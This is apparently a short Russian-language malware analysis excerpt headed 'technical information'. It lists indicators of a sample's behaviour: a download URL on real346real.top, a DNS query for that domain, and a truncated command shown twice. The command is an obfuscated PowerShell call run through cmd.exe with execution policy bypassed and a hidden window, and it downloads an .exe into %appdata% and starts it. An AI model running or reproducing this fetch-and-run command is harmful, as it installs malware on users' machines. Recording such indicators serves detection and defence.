Техническая информация
- http://real346real.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOWeRShelL.eXe -ExeCUTioNPOlICY bYPAsS -NoproFILE -WINdoWSTylE hIDDEN (NeW-objECT system.nEt.WEBCLieNt).doWNLoadfILe('http://real346real.top/search.php','%APpdata%.eXE');StART-p...
- DNS ASK re###46real.top
- '<SYSTEM32>\cmd.exe' /c "pOWeRShelL.eXe -ExeCUTioNPOlICY bYPAsS -NoproFILE -WINdoWSTylE hIDDEN (NeW-objECT system.nEt.WEBCLieNt).doWNLoadfILe('http://real346real.top/search.php','%APpdata%.eXE');StART-p...' (со скрытым окном)